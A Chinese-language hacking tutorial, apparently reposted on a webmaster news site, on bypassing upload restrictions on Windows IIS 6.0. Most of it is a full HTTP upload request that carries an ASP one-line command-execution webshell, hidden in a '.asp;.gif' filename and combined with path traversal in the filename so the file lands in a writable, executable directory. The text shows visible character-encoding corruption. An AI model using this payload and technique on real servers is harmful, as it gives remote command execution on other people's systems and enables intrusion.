| 然而。上傳目錄取消了腳本執(zhí)行的權(quán)限。 我想這里估計(jì)大家都要放棄了。 如何突破呢?其實(shí)是可以的. 關(guān)鍵是 [不修改名字] 先來(lái)看看一個(gè)上傳的數(shù)據(jù)包: POST /fa-bu/upload/upfile1.asp HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://xxxxx/fa-bu/upload/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: xxx.xxxx.xxnet Content-Length: 448 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN -----------------------------7da290150c5e Content-Disposition: form-data; name="act" upload -----------------------------7da290150c5e Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif" Content-Type: text/plain <%execute(request("cmd"))%> -----------------------------7da290150c5e Content-Disposition: form-data; name="Submit" up -----------------------------7da290150c5e-- 關(guān)鍵是 : Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif" 我首先呢。 filename他是如何判斷 那個(gè)開始就是文件名呢? 他是判斷filename里的最右邊的一個(gè)"\"以后的就是文件名字了。 大家因該知道。 在windows下 "\" 和 "/" 是不分家的。 假設(shè)上傳之后的目錄為upload/ 然后一個(gè)可以執(zhí)行可以寫的目錄為 okokok/ 那么我們只要構(gòu)造 Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\./../okokok/111.asp;.gif" 那么我們上傳的文件就成功的傳進(jìn)去了 okokok/111.asp;.gif了。 突破之! PS: win+iis6.0測(cè)試成功。 |
免責(zé)聲明:本站部分文章和圖片均來(lái)自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信
大家都在看
